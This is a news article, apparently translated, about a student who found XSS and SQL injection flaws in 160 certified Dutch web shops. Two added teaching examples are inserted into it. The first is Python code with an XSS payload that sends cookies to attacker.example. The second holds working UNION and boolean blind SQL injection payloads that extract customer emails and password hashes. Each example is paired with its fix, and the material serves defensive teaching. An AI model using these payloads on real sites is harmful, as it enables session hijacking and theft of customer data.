A 17-year-old student has, in the course of two days, found vulnerabilities on the websites of 160 shops carrying the Thuiswinkel.org certificate. The organization behind the label says it will pay more attention to security.
“I went through the list of members of Thuiswinkel.org looking for vulnerable shops,” says communications student Daniël Heesen. In total the researcher checked 1200 stores. Heesen says he found leaks on 160 of those websites. “I checked each site in one place,” says the researcher. In most cases that was the search field, into which he entered strings that may indicate vulnerabilities.
The vulnerabilities found were mainly cross-site scripting (XSS) vulnerabilities, through which cookies can be stolen and malicious code can be executed in the visitor's browser. To actually exploit such a vulnerability, a victim still has to be lured into clicking a specially prepared link. It is a relatively innocent vulnerability, but among the 143 websites that were susceptible to XSS were major online retailers such as BelCompany, V&D and BCC.
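The following is an added example, not code from the article or from any of the shops it names. It renders a toy search-results page two ways to show why a search field that echoes its input unescaped is a reflected XSS sink, what the "specially prepared link" looks like, how the one-place probe the researcher describes detects the flaw, and how output encoding closes it. The page template, the shop and attacker URLs (reserved .example hosts) and the payload are all constructed for this example.

```python
"""Added example, not code from the article or from any of the shops named in
it: a toy search-results page rendered two ways, to show why a search field
that echoes its input unescaped is a reflected XSS sink, how an attacker's
"specially prepared link" carries the payload, and how output encoding closes
the hole. The page template, URLs and payload are all constructed here."""
import html
from urllib.parse import urlencode

# Constructed template: the search term is reflected in both text and
# attribute context, as a typical shop results page would do.
PAGE = '<h1>Results for: {term}</h1>\n<input name="q" value="{term}">'

# A canary containing the characters that break out of text and attribute
# context; if it comes back verbatim, the page reflects input unescaped.
CANARY = 'xq"\'<>'


def render_vulnerable(term: str) -> str:
    """Interpolates the raw search term into the HTML (the flaw)."""
    return PAGE.format(term=term)


def render_fixed(term: str) -> str:
    """Same page, but the term is HTML-escaped for both text and attribute
    context (quote=True also escapes " and ')."""
    return PAGE.format(term=html.escape(term, quote=True))


def reflects_unescaped(render) -> bool:
    """The one-place check the article describes: submit a probe string to the
    search field and see whether it is reflected without encoding."""
    return CANARY in render(CANARY)


def attacker_link(shop_url: str, payload: str) -> str:
    """Builds the link a victim would have to click; the payload travels in
    the q parameter and is reflected by the vulnerable page."""
    return shop_url + "?" + urlencode({"q": payload})


def executes_script(page: str) -> bool:
    """Crude stand-in for the browser: does an injected <script> tag survive
    into the document? Real browsers parse far more than this; the point is
    the contrast between the two renderers."""
    return "<script" in page.lower()


# Hypothetical attacker host (reserved .example TLD). The payload closes the
# value attribute and the input tag, then exfiltrates document.cookie.
PAYLOAD = ('"><script>new Image().src="https://attacker.example/c?"'
           '+document.cookie</script>')

if __name__ == "__main__":
    link = attacker_link("https://shop.example/search", PAYLOAD)
    print("vulnerable reflects canary:", reflects_unescaped(render_vulnerable))
    print("fixed reflects canary:     ", reflects_unescaped(render_fixed))
    print("script survives (vuln):    ", executes_script(render_vulnerable(PAYLOAD)))
    print("script survives (fixed):   ", executes_script(render_fixed(PAYLOAD)))
    print(link)
```

The canary probe is the cheap check a tester runs first: one request per input, no payload needed. Escaping at output time, with quotes included, is what makes the same template safe in both the text and the attribute position.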
More serious were the 17 SQL injection vulnerabilities Heesen found. With SQL injection, where user input is interpreted as part of a valid SQL query, an entire database can in theory be extracted. Among others, Baby-Dump.nl and Kabeltje.com contained such vulnerabilities, but these have since been closed. “Some websites are still leaking,” says Heesen, but a number of the stores have taken action.
“These are probably not the only leaks in the shops, because I have not, for example, checked for blind SQL injections,” says Heesen. With blind SQL injection a website is vulnerable to SQL injection, but the results of a command are not displayed. An attacker can then still run commands via a detour, for instance by inferring the data one character at a time from whether the page's response changes.
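The following is an added example, not code from the article or from any shop it names, covering both the SQL injection of the previous paragraph and the blind variant of this one. It runs a toy web-shop search against an in-memory SQLite database and shows the flaw three ways: a classic injection through the search field where the stolen rows come back in the result list, a boolean-based blind injection where the page only reveals whether anything matched and the attacker still extracts a value character by character, and the parameterized query that closes both. The schema, table and column names and the customer data are constructed for this example.

```python
"""Added example, not code from the article or from any shop it names: a toy
web-shop search backed by an in-memory SQLite database. It shows (1) classic
SQL injection through the search field, where the stolen rows come back in the
result list, (2) boolean-based blind SQL injection, where the page only reveals
whether anything matched and the attacker still extracts data one character at
a time, and (3) the parameterized query that closes both. Table names, columns
and data are constructed for this example."""
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed sample schema and rows; no real shop data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'HDMI kabel'), (2, 'USB kabel');
        INSERT INTO customers VALUES (1, 'alice@example.test', 'h4sh');
    """)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """The flaw: the search term is pasted into the SQL text, so quotes and
    keywords typed by the user are parsed as part of the query."""
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def search_blind(conn: sqlite3.Connection, term: str) -> bool:
    """Same flaw, but the page only says 'results found' or 'no results';
    the rows themselves are never shown (the blind case from the article)."""
    return len(search_vulnerable(conn, term)) > 0


def search_fixed(conn: sqlite3.Connection, term: str) -> list:
    """Parameter binding: the term stays data, whatever characters it holds."""
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


# Classic injection: close the LIKE literal, UNION in another table, and
# comment out the rest of the original query (-- is a line comment in SQLite).
UNION_PAYLOAD = "' UNION SELECT email || ':' || password_hash FROM customers -- "


def blind_extract(conn: sqlite3.Connection, column: str, max_len: int = 40) -> str:
    """Boolean-based blind extraction: for each position, try each candidate
    character; the injected AND clause makes the search return rows only when
    the guess is right, so 'results found' leaks one character per hit."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789@.:_-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (f"' AND (SELECT substr({column},{pos},1) FROM customers "
                       f"WHERE id=1)='{ch}' -- ")
            if search_blind(conn, payload):
                recovered += ch
                break
        else:
            break  # no candidate matched: past the end of the value
    return recovered


if __name__ == "__main__":
    db = setup_db()
    print("normal search:  ", search_vulnerable(db, "kabel"))
    print("union payload:  ", search_vulnerable(db, UNION_PAYLOAD))
    print("blind extract:  ", blind_extract(db, "email"))
    print("fixed + payload:", search_fixed(db, UNION_PAYLOAD))
```

The blind routine needs one request per candidate character per position, which is slow but entirely mechanical, and it works against a page that never prints a single database row; that is why not testing for blind injection leaves a real gap, as Heesen notes. The fix is the same in both cases: bind the search term as a parameter rather than splicing it into the query text.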
The researcher reported his findings to the Thuiswinkel.org foundation, which manages a hallmark for web shops. Heesen focused his research on shops carrying the Thuiswinkel.org mark. After consultation with Tweakers.net, the organization informed its affiliated merchants on Tuesday morning. Wijnand Jongen, director of Thuiswinkel.org, says he hopes the research contributes to better protection of online stores.
Heesen says that a vulnerability in the web shop CheapTickets.nl made him wonder which other stores were leaking. At CheapTickets.nl a hacker managed to steal the data of 715,000 customers. Jongen says his organization had already decided, after the publication of that particular leak, to pay more attention to the security of online stores. “We do not currently check our members on security, but that is going to change,” says Jongen. “Security of web shops is a big deal.”
The requirements merchants must meet in order to carry the Thuiswinkel.org mark are to be supplemented with security requirements. Web shops that do not keep to the requirements run the risk of being suspended or even expelled. How the websites will be checked is not yet known. Jongen says the organization still needs to look at what is ‘feasible’.